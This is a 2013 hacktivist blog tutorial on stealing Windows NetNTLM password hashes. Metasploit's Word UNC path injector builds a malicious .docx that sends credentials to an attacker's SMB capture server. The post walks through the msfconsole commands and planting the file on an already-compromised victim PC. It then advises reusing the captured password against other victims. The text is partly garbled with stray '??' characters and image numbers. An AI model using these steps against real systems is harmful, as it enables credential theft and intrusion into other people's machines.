CyberGuerrilla 2013
 Vol.3--No.2013 | 4 Users Online
Friday,May 24,2019 
By ro0ted avatar | May 31, 2013 - 15:40 | Posted in /b/ | 1 Comment

#ro0ted #OpNewblood | Hack netNTLM Credential using Microsoft Word UNC Path Injector

Hack netNTLM Credential using Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored net NTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

Exploit Targets

Microsoft Word 2003

Microsoft Word 2007

Microsoft Word 2010

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit??(many tutorials on here CyberG on Metasploit #ro0ted)

Now Open backtrack terminal type??msfconsole

 

12

 

 

Now type??use auxiliary/docx/word_unc_injector

msf exploit (word_unc_injector)>set lhost 192.168.1.2??(IP of Local Host)

msf exploit (word_unc_injector)>exploit

Now we successfully generate the??malicious docx??File, it will stored on your local computer

/root/.msf4/local/msf.docx

 

13

 

 

Now use ???upload?????command to upload the??msf.docx??in victim pc using

Upload /root/.msf4/local/msf.docx.

 

14

 

 

Now ??use auxiliary/server/capture/smb

msf exploit (smb)>run

??

When victim open your??msf.doc??files you will get the password hash after get the victim password hashes, you can ??try to connect to another victim use the same password

 

151617

 

18

 

 

 

 

(Visited 1 times, 1 visits today)


  • You can follow any responses to this entry through the RSS 2.0 feed.
  • Both comments and pings are currently closed.

One Response to #ro0ted #OpNewblood | Hack netNTLM Credential using Microsoft Word UNC Path Injector

  1. July 3, 2013 at 17:54
    Anonymous says:
    avatar

    Fucking idiot

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.

nonymous. Whoever you are, we are ungovernable!
> =[]= This site is run by cyberguerrilla, your friendly anonymous autonomous tech collective since 2010 =[]= This the past that can NOT be changed! <